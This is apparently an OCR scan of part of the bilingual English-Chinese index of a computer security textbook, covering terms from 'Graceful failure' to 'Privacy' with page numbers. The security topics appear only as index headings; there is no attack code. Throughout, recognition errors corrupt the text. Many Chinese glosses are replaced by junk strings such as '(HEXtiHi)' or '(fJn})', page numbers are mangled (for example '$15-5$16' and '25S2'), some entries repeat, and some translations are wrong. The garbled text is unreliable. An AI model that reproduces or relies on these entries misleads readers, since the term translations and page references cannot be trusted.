Graceful failure (优雅 的 失败 )，344 
GRANT command (GRANT 命令 )，162 
Graphical user interfaces (GUI， 图 形 用 户 界面 )，575 
grep program (grep 程序 )，380 
Group (组 ),，49,，110，118-119，165，252-253，261， 
275, 377, 381-383, 408, 409, 411, 412, 472, 
481, 485, 491, 561, 572, 593, 607, 656, 696 
Group keys (21 #74) ), 722, 725 
Group master keys (GMK, 4H #44), 725 
Group temporal key (GTK, ， 组 临时 密 钥 )，725 
Guard pages (保护 页 )，348 
Guest OS (客机 操作 系统 )，414-416 
H 
Hacker / cracker (M4), 71, 76, 252, 278, 307 
Hacking project (黑客 项 目 )，732-733 
Hacktivists (黑客 分 子 )，253 
Handling of program input (程序 输入 处 理 )，362-373 
Handshake Protocol (握手 协议 )，TLS ，670-672 
Hardening (硬化 )，400-404，407，409，411-413 
Hardware (硬件)，7，12，169 
efficiency (效率 )，627 
Hashed passwords ( 散 列 口令 )，72-74 
Hash functions ( 散 列 函数 ) 
applications of (应 用 程序 )，44-45 
collision resistant ( 抗 碰撞 )，43 
HMAC, 641-644 
intrusion detection (人 侵 检 测 )，45 
message authentication and (消息 认证 )，37-45 
one-way (fJn}), 40-42, 70, 74 
one-way (A [n]), 635 
preimage resistant (抗原 象 )，43-44 
second preimage resistant (第 二 抗原 象 )，43 
secure (安全 )，41-42 
Secure Hash Algorithm ( SHA， 安全 散 列 算法 )， 
637-640 
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simple SHF (简单 安全 散 列 函数 )，635-637 
Heap (4#), 350 
Heap overflow (HEXtiHi), 350-353 
Heartbeat Protocol (心跳 协议 )，TLS ，672-673 
Heartbleed (心脏 出 血 漏洞 )，674 
Heating, ventilation, and air-conditioning (HVAC, 加 
热 ， 通 风 和 空调 )，512 
hello function (hello pki), 329-331 
Hierarchies, RBAC (JX, RBAC), 124-125 
High interaction honeypot ( jay 20 HME), 278 
HMAC, 42, 641-644 
algorithm (算法 )，642-643 
design objectives (设计 对 象 )，641-642 
security of (安全 性 )，643 
Honeynet project ( 蜜 网 项 目 )，278 
Honeypots (RE), 278-280 
fully internal (全 内 部 )，280 
high interaction (高 交互 )，278 
low interaction( 低 交互 )，278 
outside the external firewall (外 部 防火 增 之 外 )，279 
Horizontal cabling (水 平 电缆 )，174 
Horizontal distribution area (HDA， 水 平分 布 区 )，176 
Host attacks (主机 攻击 )，97 
Host audit record (HAR， 主 机 审计 记录 )，266-267 
Host-based behavior-blocking software (基于 主机 的 
行为 阻 断 软 件 )，218 
Host-based detectors (基于 主机 的 检测 需 )，274 
Host-based firewalls (基于 主机 的 防火 墙 )，299-300 
Host-based IDSs ( HIDSs， 基 于 主机 的 入 侵 检 测 系 
统 )，216-219, 257, 262, 265 
anomaly (Fe ATHY), 263-264 
benefit of (优势 )，262 
data sources (数据 源 )，262-263 
distributed (分 布 式 )，265-267 
sensors (MAr), 262-263 
signature or heuristic based (基于 特征 或 启发 式 
的 )，265 
Host-based intrusion prevention systems (HIPS， 基 
于 主机 的 入 侵 防御 系统 )，306-308 
Hosted virtualization (主机 虚拟 化 )，415，416，420 
Host input/output (主机 输入 /输出 )，307 
Host-resident firewall (主机 驻 留 防 火 墙 )，304 
HTTP flood (HTTP 泛 洪 )，238-239 
HTTPS (基于 SSL 的 HTTP), 207 
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Human attack surface (人 为 攻击 面 )，21 
Human-caused threats (人 为 导致 的 威胁 )，$15-5$16， 
518-519 
Human resources security (人 力 资源 安全 ) 
computer security incident response team ( CSIRT, 
计算 机 安全 事件 响应 团队 )，539-546 
e-mail and internet use policies (邮件 和 Internet 使 
用 策略 )，538-539 
employment practices and policies (雇用 实践 和 策 
Wf), 535-538 
security awareness, training and education (安全 
mW, WA, AA), 529-535 
Humidity (XE), 511-512 
Hurricanes (KWEL), 509 
Hybrid cloud (混合 云 )，429 
Hydraq Trojan (Hydraq 木马 )，204 
Hypertext transfer protocol (HTTP， 超 文本 传输 协议 ) 
connection closure (连接 关闭 )，676 
connection initiation (连接 开局 )，675-676 
Hypertext Transfer Protocol (HTTP)-based attack 
(基于 超 文本 传输 协议 的 攻击 )，238-239，27] 
Hypervisor (管理 程序 )，214，401，414-416 
type (类 型 )，415 
type (类 型 )，415 
Hypervisor security (管理 程序 安全 )，418-419 
| 
Ice storm ( 冰 风 暴 )，5$11 
ICMP flood attack (ICMP 泛 洪 攻击 )，235 
Identification (认证 )，16，64，86，88-90，215，244， 
262, 472-474, 494, 501 
Identifier (ID, 4+), 70, 72 
Identity and access management (IAM) system (身份 
和 访问 管理 系统 )，139，440 
Identity, credential, and access management (ICAM, 
身份 、 证 书 和 访问 管理 ) 
access management (访问 管理 )，135 
credential management (证 书 管 理 )，134-135 
identity federation (身份 联盟 )，135 
identity management (身份 管理 )，134 
purpose of (目的 )，134 
Identity federation (里 份 联盟 )，135 
Identity management (身份 管理 )，134，588 
Identity providers (IDPs， 身 份 提供 者 )，139 
Identity service provider (身份 服务 提供 者 )，139 


Identity theft (身份 盗用 )，209-210，702 
IDS, 42 Intrusion detection systems 
IEEE 802.11 wireless LAN ( IEEE 802.11 无 线 局 域 
RJ), 708-714 
architectural model (架构 模型 )，711-712 
logical link control (逻辑 连接 控制 )，711 
MAC (消息 认证 码 )，710-711 
network components (网 络 组件 )，711-712 
physical layer (物理 层 )，709-710 
protocol architecture (协议 架构 )，709-710 
services (服务 )，712-713 
IEEE 802.11i wireless LAN ( IEEE 802.11i 无 线 局 域 
网 )，714-729 
access control approach (访问 控制 方法 )，720 
CCMP (计数 器 模式 密码 块 链 消息 完整 码 协 议 )，727 
discovery phase (发 现 阶段 )，718-719 
EAP exchanges (EAP 交换 )，721-722 
group key distribution (组 密 钥 的 分 发 )，726 
group keys (组 密 钥 )，725 
key management phase ( 密 钥 管理 阶段 )，722-725 
MPDU exchange (MPDU 交换 )，721 
operation (#2/F), 715-718 
pairwise key distribution (对 偶 密 钥 的 分 发 )，725-726 
PRF, 727-729 
protected data transfer phase (保护 数据 传输 阶段 )， 
727 
security capabilities (安全 能 力 )，719 
services (服务 )，715 
TKIP, 727 
IEEE ( Institute of Electrical and Electronics Eng- 
ineers ) P1363 Standard for Public-Key Cryp- 
tography (IEEE P1363 公 钥 加 密 标 准 )，50 
Code of Ethics (道德 准则 )，600 
IEEE 802.1X access control approach ( IEEE 802.1X 
访问 控制 方法 )，720 
IETF Public Key Infrastructure X.509 (PKIX) model 
(IETF 公 钥 基础 设施 X.509 模型 )，696 
Illegal/logically incorrect queries (非法 / HAIR 
查询 )，159 
Implementation plan (实施 计划 ) , 460, 489-490, 
498, 504 
Inband attack ( 带 内 攻击 )，158 
Incapacitation (失效 )，10-11 
Incident handling (事件 处 理 )，500，502 
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information flow for (信息 流 )，545-546 
life cycle (生命 周期 )，544 
Incident response (事件 啊 应 )，16，494，503，504 
Independent BSS (IBSS， 独 立 基本 服务 集 )，712 
Infection vector (感染 向 量 )，189 
Inference (推理 ， 推 测 )，10，166-168 
channel (通道 )，167 
database security (数据 库 安全 )，166-168 
detection at query time (查询 时 探测 )，167 
detection during database design (数据 库 设计 时 探 
测 )，167 
example (示例 )，167 
threat of disclosure by (泄露 的 威胁 )，167 
Inferential attack (推理 攻击 )，159 
Inflexibility (灵活 性 )，169 
Informal approach, security risk assessment ( 非 正 式 
方法 ， 安 全 风险 评估 )，467 
Information Card Foundation ( ICF， 信 息 卡 片 基金 
会 )，138 
Information system (IS， 信 息 系 统 )，549 
Information system hardware (信息 系统 硬件 )，508 
Information technology security control (信息 技术 安 
全 控制 )，489-497 
implementation of (实现 )，499 
maintenance and monitoring of implemented 
controls (实现 控制 的 维护 和 监控 )，500-502 
Information technology security management (信息 技 
术 安 全 管理 )，489，499，501 
definition (定义 )，460 
implementation of (实现 )，489 
ISO/IEC 27000 series of standards (ISO/IEC 27000 
系列 标准 )，460 
organizational context and security policy (组 织 上 
下 文 和 安全 策略 )，462-465 
overview of (概况 )，461 
safeguards (防护 )，6，465，489-497 
Information technology security plan (信息 技术 安全 
计划 )，498-499 
implementation of (实现 )，499 
information technology security risk assessment 
process (信息 技术 安全 风险 评估 过 程 )，461 
baseline approach (基线 方法 )，466-467 
combined baseline, informal, and detailed approach 


(联合 基线 、 非 正式 的 、 详 细 的 方法 )，468 


detailed (详细 的 )，467-468 
informal approach ( 非 正 式 方 法 )，467 
Information theft (信息 窃取 ) 
credential theft (AMA), 209 
data exfiltration (数据 泄露 )，211 
espionage (/HJHE), 210-211 
identity theft (44774), 209-210 
keyloggers (键盘 记录 )，209 
phishing (仿冒 ， 钓 鱼 ), 184, 188, 202-204, 209- 
210, 254, 314, 582 
reconnaissance (侦查 )，210-211 
spyware (间谍 软件 )，209 
Infrastructure as a Service (IaaS ， 基 础 设施 即 服务 )， 
426-427 
Infrastructure controls (基础 设施 控制 措施 )，496 
Infrastructure traffic (基础 设施 流量 )，419 
Infringement, intellectual property and (侵权 ， 知 识 
产权 )，583-584 
Ingress monitors (进入 监控 )，219 
Injection attack (ŁA Icih), 155-161, 364-368 
Inline sensor (内 联 传感器 )，268，281 
Input fuzzing (输入 模糊 )，372-373 
Insecure interfaces (不 安全 接口 )，436 
Inside attack (内 部 攻击 )，9 
Instructor’s Resource Center (IRC， 指 导 资 源 中 心 ) 732 
case studies (案例 学 习 )，737 
Integer overflows (整数 溢出 )，353 
Integration of security policies and techniques (安全 
策略 和 技术 的 整合 )，450 
Integrity (完整 性 )，3，S$，12-13，101 
system and information (系统 和 信息 )，17 
Integrity check value (完整 性 校 验 值 )，680 
Intel digital random number generator (DRNG) ( Intel 
IF BELA 8B), 57 
Intellectual property (知识 产权 )，583 
copyrights (版 权 )，583 “ 
infringement ({24%), 583-584 
patents (I|), 583, 585 
relevant to network and computer security (相关 网 
络 和 计算 机 安全 )，585-586 
trademark (商标 )，585 
types of (类 型 )，583-585 
U.S. Digital Millennium Copyright Act(DMCA) (3 
国 数字 千年 版 权 法 案 )，586-587 
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Interception ({=#%), 10, 219, 567, 581 
Interface (接口 )，293 
International Convention on Cybercrime (针对 网 络 
犯罪 国际 会 议 )，580 
International Organization for Standardization (ISO, 
国际 标准 化 组 织 ),，27，154，459-460，493，554， 
556-557 
International Telecommunication Union (ITU, br 
HIRI EH), 27, 550, 692 
Internet authentication (Internet 认证 ) 
Kerberos, 685-691 
public-key infrastructure ( PKI， 公 钥 基 础 设施 )， 
694-696 
X. 509, 691-694 
Internet banking server (IBS， 网 银 服务 器 )，23 
Internet Engineering Task Force (IETF, Internet 工 
程 任务 组 )，696 
Public-Key Infrastructure X.509 (PKIX, 72 4H 4 
础 设施 X.509 ), 696 
Internet mail architecture ( Internet 邮件 体系 结构 )， 
665-666 
Internet Message Access Protocol (IMAP, Internet 
消息 访问 协议 )，271 
Internet of Things (IoT， 物 联网 )， 
and cloud context ( 云 环 境 )，445-448 
components of (组 成 成 分 )，444-445 
evolution (演化 )，444 
gateway security functions (网 关 安 全 功能 )，451 
open-source security module (开源 安全 模块 )， 
454-456 
overview of (概况 )，444 
patching vulnerability〈 修 补漏 洞 )，449 
privacy requirements (隐私 要 求 )，449-451 
security (安全 性 )，448 
security elements of (安全 要 素 )，448-449 
security framework (安全 框架 )，452-454 
Internet of Things (IoT) enabled device ( 物 联 化 设备 ) 
actuator (执行 嚣 )，445 
microcontroller 〈 微 控制 希 )，445 
radio-frequency Identification (RFID， 射 频 识 
别 )，445 
sensor (ERAF), 444-445 
transceiver (WAR), 445 
Internet protocol protection (Internet Hi (RIF), 453 


Internet Relay Chat (IRC, Internet 中 继 聊 天 ) 236, 271 
networks (24), 207-208 
Internet security protocol ( Internet 安全 协议 )， 参 见 
IP security 
DKIM (域名 认证 邮件 )，664-668 
HTTPS, 675-676 
IPv4 security (IPv4 &4>), 676-681 
IPv6 security (IPv6 &4>), 676-681 
secure E-mail (安全 电子 邮件 )，661-664 
S/MIME (安全 /多 用 途 Intemet 邮件 扩展 )，661-664 
SSL (安全 套 接 层 )，668-675 
TLS (传输 层 安 全 )，668-675 
Internet society (Internet 协会 )，27 
Internet use policies (Internet 使 用 策略 )，538-539 
Interposable libraries (4#f AJ), 565-568 
Interposable library function (4A AJ# RKI), 566-568 
Intruders (AfZ# ), 252-256 
behavior (ÍT), 254-256 
classes of (5|), 252-253 
cyber criminals (网 络 犯罪 )，252-253 
definition (定义 )，25S2 
hacktivisits (激进 分 子 )，253 
initial access (初始 访问 )，255 
intrusion detection (入 侵 检 测 )，256-259 
maintaining access (保持 访问 )，255 
privilege escalation (特权 扩大 )，255 
range of attacks (攻击 范围 )，254 
skill levels (RFK), 253-254 
target acquisition and information gathering (目标 
获取 和 信息 收集 )，254-255 
Intrusion (入 侵 )，10 
Intrusion Detection and Prevention System (IDPS, 
入 侵 检 测 和 预防 系统 )，306 
Intrusion Detection Exchange Protocol (IDXP, A}? 
检测 交换 协议 )，276 
Intrusion Detection Message Exchange Format 
(IDMEF， 入 侵 检测 消息 交换 格式 )，276 
Intrusion detection systems (IDS， 人 入侵 检测 系统 )，542 
exchange format (交换 格式 )，275-277 
Intrusion Detection Exchange Protocol (IDXP, A 
侵 检测 交换 协议 )，276 
Intrusion Detection Message Exchange Format 
(IDMEF， 入 侵 检测 消息 交换 格式 )，276 
Intrusion management (人 侵 管 理 )，441 


Intrusion prevention systems ( IPS， 入 侵 防 御 系 统 )， 
254, 306-310, 542 
distributed or hybrid (分 布 式 或 混合 型 )，308-310 
host-based (基于 主机 )，306-308 
network-based (基于 网 络 )，308 
Snort Inline (Snort 内 联 )，309-310 
unified threat management ( UTM， 统 一 威胁 管 
理 )，310-314 
Inverse add round key transformation ( 逆 回 轮 密 钥 加 
变换 )，618 
Inverse shift row transformation (逆向 行 移 位 变换 )，618 
Inverse subtitue bytes transformation (逆向 字 节 代 换 
变换 )，616 
INVITE request (邀请 请 求 )，237 
IP address spoofing (IP 地 址 欺骗 )，295 
ipfw program (ipfw 程序 )，410 
IPhone Trojans (IPhone 木马 )，204 
IP protocol field (IP 协议 字段 )，293 
IPS, ÆJ Intrusion prevention systems 
IPsec platform (IPsec 平台 )，304 
IP security (IPSec, IP &&), 53, 390, 692 
applications of (应 用 程序 )，677 
benefits (E3), 677-678 
ESP (封装 安全 负载 )，679-680 
protocol mode (协议 模式 )，679 
routing applications (路 由 程序 )，678 
SA (安全 关联 )，678-679 
scope (范围 )，678 
iptables program (iptables 程序 )，410 
IPv4, 271, 676-681 
IPv6, 243, 676-681 
IR 7298, Glossary of Key Information Security Terms 
(信息 安全 关键 术语 词汇 表 )，106 
Iris biometric authentication system (虹膜 生物 认证 
系统 )，89，97-99 
Iris-recognition camera (虹膜 识别 摄像 头 )，98 
ISO, ÆJ International Organization for Standardization 
ISO 27002, 556-557 
ISO/IEC 27002 security controls ( ISO/IEC 27002 安 
全 控制 )，493 
Isolation (隔离 )，20 
Issuer name (发 行商 名 称 )，692 
IT security management (IT 安全 管理 ),definition ( 定 
义 )，460 
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ITU Telecommunication Standardization Sector (ITU 
电信 标准 部 门 )，692 
J 
journeyman (742-7), 253 
K 
Kerberos environment (kerberos 环境 )，689 
Internet authentication and (Internet TAHE), 685-691 
performance issues (性 能 问题 )，691 
ticket-granting server (TGS， 票 据 授 予 服 务 问 )， 
687-688 
ticket-granting ticket (TGT， 票 据 授予 票据 )，686 
version 4, and 5 (版 本 4 和 5 )，690-691 
Kerberos protocol (kerberos 协议 )，685-689 
Kerberos server (kerberos 服务 器 )，689 
kernel (内 核 ) 117, 212, 219, 328, 335, 347, 398-399, 
402, 410, 414, 569 
Kernel mode (内 核 模 式 )，117 
Kernel mode rootkits (内 核 模式 rootkits)，213 
Key distribution center (KDC， 密 钥 分 发 中 心 )，629 
Key distribution, symmetric encryption ( 密 钥 分 发 ， 
对 称 加 密 )，628-629 
Keyed hash MAC ( 密 钥 散 列 MAC), 42 
Key expansion〈 密 钥 扩 展 )，619 
Keyloggers (键盘 记录 需 )，18$，209 
Keylogging (键盘 记录 )，207 
Key management (4HE), 50-55, 58, 169 
Key pair recovery ( 密 钥 对 恢复 )，696 
Keys ($H) 
private (ALA), 656 
public (Z$4£), 45, 49, 654, 656, 694 
Keystream (HHL), 36, 619 
Klez mass-mailing worm (Klez 大 规模 邮件 蠕虫 )，205 
Known session ID (已 知 会 话 ID)，24 
L 
Laboratory exercises (实验 室 练 习 )，733 
LAN monitor agent (局 域 网 监控 代理 )，266 
Laptop data encryption (笔记 本 电脑 数据 加 密 )，58 
LavaRnd, 57 
Law enforcement agencies (执法 机 构 )，580 
Layering (分 层 )，20 
Leaky system resources (脆弱 系统 资源 )，8 
Least astonishment (最 少 惊动 )，21 
Least common mechanism (最 少 共用 机 制 )，19 
Least privileges (最 少 特 权 )，19，382-384，537 
Legal aspects of computer security (计算 机 安全 的 法 
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HEHH), 4, 25, 106, 228, 248, 278, 462-464, 
466, 468, 470, 481, 483, 496 
cybercrime and (网 络 犯罪 ) 579-583 
ethical issues (规范 问题 )，596-601 
intellectual property and (知识 产权 )，583-589 
Level of risk (风险 层次 ) 9, 279, 465-466, 471, 
474, 477-478, 482, 485, 496-497, 504 
Liability (责任 )，530 
Libraries (JÆ), 212, 307, 332 
anti-XSS (ft XSS), 372 
dynamic (动态 的 )，353 
dynamically linked shared (动态 链接 共享 )，566 
dynamically loadable (动态 可 加 载 )，379，381 
dynamically loaded (动态 加 载 )，298 
Dynamic Link Libraries (DLL， 动 态 链接 库 )，263 
executable (可 执行 )，410 
interposable (插入 )，565-568 
safe (安全 )，345 
shared (共享 )，566 
standard (标准 )，341，345，348，381 
statically linked (静态 链接 )，566 
statically linked shared (静态 链接 共享 )，566 
TCP wrappers (TCP 包装 )，409 
third-party application (第 三 方 应 用 程序 )，345 
Library-based tape encryption (基于 库 的 磁带 加 密 ) 58 
Library function (JÆ phi Bl), 325, 350, 351, 384- 
387, 565-568 
Libsafe, 345 
Lifecycle management (生命 周期 管理 )，134 
Lightning (内 电 )，511 
Lightweight Directory Access Protocol (LDAP, ## 
量 目录 访问 协议 )，442 
Likelihood (相似 性 )，25，45，77，188，200，203， 
210, 309, 362, 373, 377, 385, 466467, 469, 
474-478, 480, 482-485, 496, 500, 503 
Limited role hierarchy (A PRA EJZ), 124-125 
Link encryption ( 链 路 加 密 )，628 
Linux / Unix security (Linux/UNIX 安全 ) 
access controls (访问 控 制 )，409-410 
application and service configuration (应 用 程序 和 
服务 配置 )，408 
application security using a chroot jail (使 用 chroot 
监牢 的 应 用 程序 安全 )，410-411 
logging and log rotation (日 志和 日 志 回 滚 )，410 


patch management (补丁 管理 )，407-408 
testing (测试 )，411 
troubleshooting a chroot application (调试 遇 到 问 
题 的 监牢 应 用 )，410-411 
users, groups and permissions (用 户 ， 组， 许可 )， 
408-409 
Literary works, copyrighted (文学 作品 ， 版 权 )，584 
Loadable modules (可 加 载 模块 )，569 
Local area network (LAN, 局 dk 网 )，10，101， 
268, 271, 303 
Lock (#), 387 
Lockfile, software security (加 锁 文 件 ， 软 件 安全 )， 
387-389 
Log (日 志 ), 72, 77, 93-94, 158, 194, 256, 262, 
277, 278, 281, 297, 299, 303, 310, 382, 
403, 406, 410, 500, 549, 557, 559-565, 
570-575, 686, 687 
Log analysis (H a4} #7), 562 
tools (TĦ), 542 
Log file encryption (日 志文 件 加 密 )，563 
logger (日 志 记 录 毅 )，562 
Logging function ( H ms PKi2X), 406, 410, 559-562 
at the application level (应 用 程序 级 别 )，565 
interposable libraries (插入 库 )，565-568 
syslog (系统 日 志 )，562-565 
at the system level (系统 级 别 )，559-565 
Windows Event Log (Windows 事件 日 志 )，559-562 
Logic bomb (GZ #4KES#), 185, 189, 206 
Logic bomber (i248 KES), 189 
Logon events (登录 事件 )，56]1 
Low interaction honeypot ( {40 HEME), 278 
LulzSec, 253 
M 
Machine readable zone (MRZ， 机 需 可 读 区 域 )，85 
Mac OS X security file delete progam ( Mac OS X 安 
全 文件 删除 程序 )，386 
MAC protocol data unit (MPDU, MAC 协议 数据 单 
Ju), 710 
Macro virus ( 宏 病 毒 )，185，190，193 
MAC service data unit( MSDU, MAC 服务 数据 单 
Ju), 710, 711 
Mail delivery agent (MDA， 邮 件 发 送 代 理 )，665 
Mail submission agent (MSA， 邮 件 提 交代 理 )，665 
Main distribution area ( 主要 分 布 区 )，176 


Maintenance hook (HPF), 211 
Maintenance of information systems (信息 系统 维 
i), 16 
Maintenance of security controls (安全 控制 维 
#), 500 
Malicious association (恶意 组 织 )，702 
Malicious insiders (恶意 的 内 部 人 员 )，436 
Malicious software(malware) (恶意 软件 )，265 
attack kits (攻击 工具 套件 )，186-187 
attack sources (攻击 源 )，187 
backdoor(trapdoor) (后 门 )，10-11，185，198，211 ， 
255, 314 
bots (F #25%), 207-208, 220, 303, 601 
countermeasures for (对 策 )，214-220 
definition (72), 184 
logic bomb ($ KE SH), 185, 189, 206 
mobile code (ZARZ), 185, 198, 200 
rootkits, 185, 212-213, 219 
spreading of new (新 的 传播 )，207 
terminologies for (专业 术语 )，185 
Trojan horse (特洛伊 木马 )，11，96-97，185，230- 
204, 307 
types (741), 185-187 
malloc() XL, 347, 351 
Malvertising〈 亚 意 广 告 )，187 
Malware (恶意 软件 )， 参 见 Malicious software 
Management (E), 277, 474476, 479480, 483-484 
access (访问 )，135 
account (账户 )，561 
change (改变 )，501-502 
configuration (配置 )，12， 
content (内 容 )，588 
controls (控制 )，15，25，490，493-495 
credential (信用 )，134-135 
of data (数据 )，347，351，353 
database (数据 库 )，109，110，149-151，158，160 
Digital Rights Management ( DRM， 数 字 版 权 管 
FE), 587-589 
identity (467), 134, 588 
IT security (IT Z£), 489, 498-499 
key (S544), 50-55, 57-58, 169 
memory (HE), 347, 351, 353, 377 
network (24), 268 
patch (bT), 407-408, 411 


16, 18, 502 
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rights (权利 ， 权 限 )，588 
risk (风险 )，465-466，471，481，485 
security information and event management (SIEM, 
安全 信息 和 事件 管理 )，275 
Management-level training (管理 级 别 训练 )，534 
Management traffic (管理 流量 )，419 
Manager 经理 )，277 
Mandatory access control ( MAC， 强 制 访问 控制 )， 
109, 161, 403 
Man-in-the-middle-attacks (中间人 攻击 )，656，702 
Manning, Chelsea ($F, HJR), 253 
Manual defensive coding practices (手动 防御 性 编 
码 实践 )，160 
Markov modeling techniques (马尔 可 夫 模 型 技术 )，76 
Markov models (马尔 可 夫 模 型 )，263 
Markov process model (马尔 可 夫 过 程 模 型 )，76，263 
Masquerade, security threat by (假扮 ， 安 全 威胁 )， 
10-11, 14 
Master (主要 的 )，253-254 
Master session key (MSK ， 主 会 话 密 钥 )，722 
MDS, 44, 74, 644, 694 
MDS crypt (MD5 加 密 )，74 
Measured service cloud systems (可 测量 的 服务 云 系 
统 )，425 
Medium access control (MAC， 媒 介 访 问 控 制 )， 
573, 710-711 
association-related services (与 协会 有 关 的 服务 )， 
713-714 
control (控制 )，710 
destination MAC address ( HÉJ MAC 地 址 )，711 
header (475), 711 
spoofing (欺骗 )，702 
trailer (预告 )，711 
Melissa e-mail worm (Melissa 邮件 蠕虫 )，197 
Memory allocator (内 存 分 配器 )，353 
Memory cards (内 存 条 )，82-83 
Memory leak (AI4F iim), 377-378 
Memory management unit (MMU， 内 存 管理 单元 ) 347 
Message authentication code (MAC， 消 息 认证 人 码 )，669 
Message confidentiality, symmetric encryption and 
(消息 机 密 性 ， 对 称 加 密 )，606-629 
Message/data authentication (消息 /数据 认证 )，37-42 
authenticated encryption (AE， 认 证 加 密 )，644-647 
code (编码 )，38-40 
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a complex function of message and key (消息 和 密 
钥 的 复杂 函数 )，38 
Diffie-Hellman key exchange/key agreement ( Diffie- 
Hellman 密 钥 交换 / EE), 49, 54, 652-657 
hash function and (#7 PAX), 37-45 
HMAC, 42, 641-644 
RSA 算法 ，647-650 
using-a message authentication code (MAC) (使 用 
消息 认证 码 ) 38-40 
using a one-way hash function (fE HH -$$ fe] H X!) PKI 
žr), 40-42 
using public-key encryption (使 用 公 钥 加 密 )，41 
using secret key (使 用 秘密 密 钥 )，42 
using symmetric encryption (使 用 对 称 加 密 )，37 
without confidentiality (无 机 密 性 )，38 
without message encryption (未 进行 消息 加 密 )， 
38-42 
Message digest (消息 摘要 )，40，43，627，638 
Message integrity (消息 完整 性 )，669，715，727 
Message store (MS， 消 息 存储 )，665 
Message transfer agent (MTA， 消 息 传 输 代 理 )，665 
Message user agent (MUA， 消 息 用 户 代理 )，665 
Metamorphic virus (病毒 变种 )，193 
Metamorphic worm (蠕虫 变种 )，200 
Microcontroller ( 微 控制 器 )，445 
Miller, Barton ( 米 勒 ， 巴 顿 )，373 
Minimal effect on functionality (对 功能 影响 最 
小 化 )，554 
MiniSec operating system (MiniSec 操作 系统 )，454 
Misappropriation (盗用 )，10-11 
Misuse (WH), 10-11, 148-149, 259, 516, 581, 592, 
596, 693 
Mix column transformation ( 列 混 消 变换 )，618 
Mixter (混合 器 )，235 
Mobile code (移动 代码 )，185，198 
Mobile device security (移动 设备 安全 )，704-708 
Cloud-based applications (基于 云 的 应 用 程序 )， 
704-705 
de-perimeterization (去 边界 化 )，705 
external business requirements (外 部 业务 要 求 )， 705 
interaction with other systems (与 其 他 系统 的 交 
H.) 706 
location services (位 置 服务 )，706 
new devices, growing use of (新 设备 ， 越 来 越 多 


的 使 用 )，704 
physical security controls (物理 安全 控制 )，705 
security threats (安全 威胁 )，705 
strategy (策略 )，706-708 
traffic security (流量 安全 )，708 
untrusted applications (不 受信 任 的 应 用 )，706 
untrusted content (不 受信 任 的 内 容 )，706 
untrusted mobile devices (不 受信 任 的 移动 设备 )， 
705-706 
untrusted networks (不 受信 任 的 网 络 )，706 
Mobile phone Trojans (移动 手机 木马 )，204-205 
Mobile phone worm (移动 手机 蠕虫 )，200-201 
Mobility (移动 性 )，701 
Modes of operation (操作 模式 )，35 
symmetric encryption (对 称 加 密 )，622-628 
Modification of messages (消息 更 改 )，14 
Modification right (更 改 权 )，584 
Modularity (模块 化 )，20 
Monitoring risks (监控 风险 )，500-502 
Morris, Robert ( 莫 尔 斯 ， 罗 伯 特 )，196 
Morris worm (Morris #442), 196-197, 326, 332 
Motion pictures, copyrighted (5%, HAM), 584 
Motivation (Z)#L), 473, 529-530, 538 
MPDU exchange (MPDU 交换 ) 
association (协会 )，720 
network and security capability discovery (网 络 与 
安全 能 力 发 现 )，719 
open system authentication (开放 系统 认证 )，719 
Multics, 211 
Multi-instance model in data protection (数据 保护 的 
多 实例 模型 )，437 
Multipartite virus (多 成 分 病毒 )，193 
Multiple encodings (多 重 编码 )，371 
Multiple password use (多 重 口令 使 用 )，71 
Multipurpose internet mail extension ( MIME， 多 用 
途 Internet 邮件 扩展 )，661 
Mnulti-tenant model in data protection (数据 保护 的 多 
租户 模型 )，438 
Multivariate model (多 元 模型 )，260 
Musical works, copyrighted (音乐 作品 ， 版 权 )，584 
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pairwise master key (PMK， 成 对 主 密 钥 )，722 
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parasitic software (寄生 软件 )，188 
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选择 口令 的 口令 破解 )，75-77 
use of hashed password ( 散 列 口令 使 用 )，72-74 
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Password crack (口令 破解 )，74 
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口令 )，75-77 
file access control (文件 访问 控制 )，77-78 
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protocol (协议 )，93-94 
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令 )，79 
password checker (口令 检查 器 )，80 
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Payload data (负载 数据 )，680 
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Peer-to-peer “gossip” protocol (点 对 点 gossip HMM), 273 


563 


Perimeter scanning approach (边界 扫描 方法 )，219-220 
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定期 检查 )，571-572 
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520-523 
card issuance and management subsystem ( 卡 发 行 
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Personal technology (个 人 技术 )，444 
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Physical facility (物理 设备 )，509 
Physical isolation (物理 隔离 )，20 
Physical security (物理 安全 ) 
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premises security (场所 安全 )，508 
prevention and mitigation measures (预防 和 迁移 
措施 )，516-519 
technical threats (技术 威胁 )，515，518 
threats (威胁 )，509-516 
physical user input (物理 用 户 输 入 )，158 
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(画报 、 图 像 以 及 雕像 作品 版 权 )，584 
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Ping of death, Dos (死亡 之 ping)，227 
PIV authentication key (PIV iAiEf4), 523-524 
Plaintext (#4 3¢AS), 32-33, 45, 606, 613 
public key encryption ( 公 钥 加 密 )，45 
symmetric encryption (对 称 加 密 )，32 
Plan-Do-Check-Act Process Model (“规划 -实施 - 
检查 - 处 置 ” 过 程 模型 )，462 
Planning (计划 )，16 
Plant patent (植物 专利 )，585 
Platform as a service (PaaS， 平 台 即 服务 )，426 
Poison packet (有 害 消息 )，227 
Policy changes (策略 改变 )，561 
Policy enforcement points (PEP， 策 略 实 施 点 )，275 
Policy management (策略 管理 )，135 
Policy scope (策略 范围 )，538 
Polymorphic virus (多 态 病 毒 )，193，216 
Popular password attack( 弱 口令 攻击 )，71 
Position independent (位 置 独立 )，335-336 
x86 assembly code (x86 汇编 代码 )，336 
Post office protocol (POP， 邮 局 协议 )，271 
Practical security assessments (实际 的 安全 评估 )，736 
Preimage resistant (抗原 象 )，43 
Preimage resistant hash functions (抗原 象 散 列 函数 )， 
43-44 
Preprocessing (PARIE), 627 
Prerequisite (先决 条 件 )，126 
Preset session ID (WAW ID), 24 
Pre-shared key (PSK， 预 分 享 密 钥 )，722 
Pretty Good Privacy (PGP) package (良好 隐私 包 )，58 
Preventative controls (预防 性 控制 )，491 
Prevent/Prevention (fil 防 )，9，14-15，17，20，25-26， 
55, 71, 101, 106, 155, 160, 167, 209, 238, 
243, 246, 257, 265, 294, 297, 307, 313, 
320, 342, 348-349, 353, 358, 367-369, 
380-381, 386-387, 392, 395, 399, 401, 


404, 412, 472, 491, 493, 552, 582, 585, 
586, 590, 592 
Primary key (+ #744), 152 
Printf() library routine (printf() BUFR), 332 
Privacy (fits), 3, 539 
computer usage (计算 机 使 用 )，592-593 
and confidentiality (机 密 性 )，595 
data surveillance and (数据 监管 )，593-595 
European Union Data Protection Directive (欧盟 数 
据 保 护 指令 )，590 
law and regulations( 法 律 和 规范 )，590 
with message integrity (消息 完整 性 )，715 
organizational response (组 织 啊 应 )，$91-592 
